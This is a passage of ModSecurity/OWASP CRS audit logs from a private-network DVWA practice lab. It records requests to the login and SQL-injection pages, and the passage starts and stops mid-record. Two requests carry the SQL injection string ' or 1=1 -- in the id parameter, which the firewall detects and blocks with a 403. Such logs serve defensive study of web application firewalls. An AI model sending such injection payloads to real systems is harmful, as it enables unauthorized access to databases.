pre-check=0","Pragma":"no-cache","Location":"index.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRcQhH8AAQEAAAmHBIwAAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":685,"p2":4322,"p3":170,"p4":407,"p5":97,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:20 --0400","transaction_id":"WRcQhH8AAQEAAAmHBI0AAAAF","remote_address":"192.168.75.130","remote_port":46196,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/index.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2725","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/index.php\"] [unique_id \"WRcQhH8AAQEAAAmHBI0AAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":612,"p2":2270,"p3":248,"p4":778,"p5":152,"sr":26,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:25 --0400","transaction_id":"WRcQiX8AAQEAAAmHBI4AAAAF","remote_address":"192.168.75.130","remote_port":46196,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQiX8AAQEAAAmHBI4AAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":585,"p2":2456,"p3":109,"p4":610,"p5":96,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:25 --0400","transaction_id":"WRcQiX8AAQEAAAmHBI8AAAAF","remote_address":"192.168.75.130","remote_port":46196,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQiX8AAQEAAAmHBI8AAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":575,"p2":2153,"p3":100,"p4":375,"p5":193,"sr":23,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:30 --0400","transaction_id":"WRcQjn8AAQEAAAkW4RUAAAAB","remote_address":"192.168.75.130","remote_port":46198,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":802,"p2":3045,"p3":0,"p4":0,"p5":120,"sr":27,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:33 --0400","transaction_id":"WRcQkX8AAQEAAAkW4RYAAAAB","remote_address":"192.168.75.130","remote_port":46198,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQkX8AAQEAAAkW4RYAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQkX8AAQEAAAkW4RYAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQkX8AAQEAAAkW4RYAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id 